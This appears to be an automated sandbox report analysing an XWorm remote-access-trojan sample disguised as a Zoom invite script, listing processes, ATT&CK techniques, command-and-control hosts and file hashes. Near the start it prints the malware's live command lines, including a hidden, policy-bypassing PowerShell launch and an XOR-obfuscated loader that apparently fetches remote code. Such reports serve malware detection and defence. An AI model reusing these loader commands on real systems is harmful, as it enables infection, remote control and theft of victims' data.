            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$redro = invoke-expression ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-bxor '0x1a' ) } )-join'') ; powershell $redro"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$redro = invoke-expression ( ( [char[]] (62 , 72,39,61 ,83 , 127,66,50,84 , 127 , 61 , 33 , 62, 72, 95, 58, 39, 58 , 62 ,72 ,49 , 61,77 , 55, 85, 88,80, 61, 33 , 62, 72 ,95 ,94, 58, 39,58 ,62, 72, 95,49, 61 , 127 ,89,78 , 58 ,84,127,78,52 , 77 , 61, 33, 62,74 ,91 , 89 , 39 ,61, 127 , 88 , 89 ,86, 61, 33,62 ,98,98, 58 ,39 ,58, 62, 74, 91 , 89 , 49, 61, 83, 127,84, 61,33, 62,72,85,58, 39 ,58 , 62 ,98 , 98 ,49,61,78,51 , 52, 94 ,85 ,77 ,84, 86 , 85,61,33, 62, 96 , 96, 39 , 61 ,85, 90,42 , 50 ,60 ,50 ,61 ,61 , 114,110 , 110 , 106, 105,32, 53, 53 , 106,123 ,105, 110 , 127,52,127,127, 53, 104, 53,40, 92,94,96,126, 53, 42, 61, 61,51 , 61 , 52,72, 127 ,74,86 , 91, 89 , 127 ,50,61,85 ,90,42, 50, 60, 61 ,54 , 61, 91 ,94, 73,78 , 72, 83 ,84 ,93,61,51, 33 ,115 ,127,98 , 50,62,72 ,95, 94 , 49 , 62,72 , 85 , 49, 62 ,96 , 96 , 51 ) | %{[char] ( $_-bxor '0x1a' ) } )-join'') ; powershell $redro" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RegSvcs.exe, 0000000B.00000002.4600211473.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 18.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 18.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.2958994280.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information222
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            222
            Scripting
            211
            Process Injection
            1
            Masquerading
            OS Credential Dumping121
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            2
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)Logon Script (Windows)121
            Virtualization/Sandbox Evasion
            Security Account Manager121
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell
            Login HookLogin Hook211
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeylogging11
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517940 Sample: Zoom_Invite.call-660194855683.wsf Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 48 paste.ee 2->48 50 api.telegram.org 2->50 52 2 other IPs or domains 2->52 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 74 7 other signatures 2->74 10 wscript.exe 1 2->10         started        13 wscript.exe 2->13         started        15 wscript.exe 1 2->15         started        signatures3 70 Connects to a pastebin service (likely for C&C) 48->70 72 Uses the Telegram API (likely for C&C communication) 50->72 process4 signatures5 84 Wscript starts Powershell (via cmd or directly) 10->84 17 cmd.exe 1 10->17         started        20 cmd.exe 1 13->20         started        86 VBScript performs obfuscated calls to suspicious functions 15->86 88 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->88 90 Suspicious execution chain found 15->90 22 powershell.exe 15->22         started        process6 signatures7 56 Suspicious powershell command line found 17->56 58 Wscript starts Powershell (via cmd or directly) 17->58 60 Bypasses PowerShell execution policy 17->60 24 cmd.exe 1 17->24         started        27 conhost.exe 17->27         started        29 cmd.exe 20->29         started        31 conhost.exe 20->31         started        62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->62 33 powershell.exe 7 22->33         started        35 conhost.exe 22->35         started        process8 signatures9 80 Suspicious powershell command line found 24->80 82 Wscript starts Powershell (via cmd or directly) 24->82 37 powershell.exe 15 24->37         started        40 powershell.exe 29->40         started        process10 signatures11 76 Writes to foreign memory regions 37->76 78 Injects a PE file into a foreign processes 37->78 42 RegSvcs.exe 2 37->42         started        46 RegSvcs.exe 1 40->46         started        process12 dnsIp13 54 ALBANIAH3CKER.WORK.GD 94.198.50.33, 49719, 7000 DHUBRU Russian Federation 42->54 92 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 42->92 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Zoom_Invite.call-660194855683.wsf11%ReversingLabsScript-WScript.Trojan.XWormRAT
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            ALBANIAH3CKER.WORK.GD100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            paste.ee
            188.114.97.3
            truetrue
              unknown
              api.ipify.org
              104.26.12.205
              truefalse
                unknown
                ALBANIAH3CKER.WORK.GD
                94.198.50.33
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    ALBANIAH3CKER.WORK.GDtrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000B.00000002.4600814015.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    94.198.50.33
                    ALBANIAH3CKER.WORK.GDRussian Federation
                    56694DHUBRUtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1517940
                    Start date and time:2024-09-25 09:26:33 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Zoom_Invite.call-660194855683.wsf
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winWSF@27/8@4/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 16
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .wsf
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target RegSvcs.exe, PID 416 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: Zoom_Invite.call-660194855683.wsf
                    TimeTypeDescription
                    03:27:37API Interceptor80x Sleep call for process: powershell.exe modified
                    03:27:51API Interceptor7197701x Sleep call for process: RegSvcs.exe modified
                    09:27:35Task SchedulerRun new task: MicroSoftVisualsUpdater path: C:\ProgramData\Music\Visuals\VsLabs.vbs
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    94.198.50.33ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                      IYUHYTPBkr.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                        r2S1Hfanqk.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                          Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                            k7lvF8JOfK.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                              eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                  asd.wsfGet hashmaliciousXWormBrowse
                                    Zoom_Invite.call-660111329517.wsfGet hashmaliciousXWormBrowse
                                      reported_account_information-pdf-66268481.wsfGet hashmaliciousXWormBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ALBANIAH3CKER.WORK.GDksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        IYUHYTPBkr.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        r2S1Hfanqk.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        k7lvF8JOfK.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        asd.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        Zoom_Invite.call-660111329517.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        reported_account_information-pdf-66268481.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        api.ipify.orgCOMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 104.26.12.205
                                        http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 104.26.13.205
                                        http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 172.67.74.152
                                        http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 172.67.74.152
                                        http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.htmlGet hashmaliciousUnknownBrowse
                                        • 104.26.12.205
                                        http://pub-8cc4fdf972304092b2aa97a68f50cd88.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 104.26.13.205
                                        https://check-smulti-9635.pages.dev/robots.txt/Get hashmaliciousHTMLPhisherBrowse
                                        • 104.26.13.205
                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        • 104.26.12.205
                                        xmr_linux_amd64 (3).elfGet hashmaliciousXmrigBrowse
                                        • 104.26.13.205
                                        paste.eeNew_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        asd.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        Document-660117765723.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        evidenne_for_suspect_2481u41u824u8124-pdf-660103895361.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        FacebookViolation-660100314468.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        Invite.call-660113477887.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        api.telegram.orgInquiry List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        https://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                                        • 149.154.167.220
                                        http://www.thailand-villas.com/img/destinations/tw/Get hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        LUYYSwStKN.ps1Get hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        DHUBRUksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        IYUHYTPBkr.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        r2S1Hfanqk.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        k7lvF8JOfK.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        asd.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        Zoom_Invite.call-660111329517.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        reported_account_information-pdf-66268481.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        No context
                                        No context
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):323
                                        Entropy (8bit):5.363435887027673
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
                                        MD5:A92E44C0313DAFEC1988D0D379E41A2F
                                        SHA1:C2F5644C418A81C1FB40F74298FF39D1420BFAC0
                                        SHA-256:F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
                                        SHA-512:4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
